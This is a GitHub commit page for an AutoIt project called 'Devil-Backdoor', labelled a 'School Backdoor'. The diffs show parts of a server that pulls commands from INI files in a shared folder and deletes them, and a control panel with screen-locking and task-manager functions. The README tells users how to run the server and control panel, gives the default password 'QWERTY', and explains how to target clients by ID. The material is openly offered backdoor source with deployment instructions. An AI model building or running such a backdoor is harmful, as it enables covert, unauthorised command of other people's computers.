Skip to content

Commit

Permalink
Release!
Browse files Browse the repository at this point in the history
• Fixed all bugs, and works well.

• Removed "PublicData" function.
  • Loading branch information
Kirlovon committed Sep 12, 2017
1 parent bcbf9b0 commit a2a6390
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 14 deletions.
4 changes: 1 addition & 3 deletions Devil-ControlPanel.au3
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
Devil ControlPanel ( School Backdoor )
AutoIt Version: 3.3.14.2
Version: Beta 3 ( 20:55 11.09.2017)
Version: Release ( 19:45 12.09.2017)
#ce ----------------------------------------------------------------------------

Expand Down Expand Up @@ -106,8 +106,6 @@ While True
LockGUI()
DisableBlockTaskManager()
UnLockGUI()
Case $Text
GUICtrlSetData($InputBox, "PublicData")
EndSwitch
WEnd

Expand Down
11 changes: 1 addition & 10 deletions Devil-Server.au3
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
Devil Server ( School Backdoor )
AutoIt Version: 3.3.14.2
Version: Beta 3 ( 20:55 11.09.2017)
Version: Release ( 19:45 12.09.2017)
#ce ----------------------------------------------------------------------------

Expand Down Expand Up @@ -80,15 +80,6 @@ WEnd

; Get data from the shared folder
Func ReadServer()
; Read public data
If FileExists($Config_ServerPatch & "\PublicData") Then
Local $Data[2]
$Data[0] = IniRead($Config_ServerPatch & "\PublicData", "Data", "Type", "")
$Data[1] = IniRead($Config_ServerPatch & "\PublicData", "Data", "Command", "")
Sleep($Config_Speed * 5)
FileDelete($Config_ServerPatch & "\PublicData")
Return $Data
EndIf

; Read data from server
If FileExists($Config_ServerPatch & "\" & $Config_ClientID) Then
Expand Down
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -34,7 +34,7 @@ Save the config file, and run **Devil-Server.exe** file! If you put **True** in

Run **Devil-ControlPanel.exe** _( If you fill **ControlPanelPatch** option in config file, you can press Hotkey to run Control Panel. Default hotkey is **PAUSE** )_ and enter the password specified in the code. (Default is _QWERTY_)
Run **Devil-ControlPanel.exe** and enter the password specified in the code. (Default is _QWERTY_)
Next, in the window that appears, select the shared folder. When the interface appears, in the inputbox type the _ClientID_ to select client, that will receive the command. (You can enter _PublicData_ or click on _ClientID_ text to send the command to all clients)
Next, in the window that appears, select the shared folder. When the interface appears, in the inputbox type the _ClientID_ to select client, that will receive the command.

***
###### Devil-Backdoor project is for informational purposes only! You take full responsibility for using this sofware!
Expand Down

0 comments on commit a2a6390

Please sign in to comment.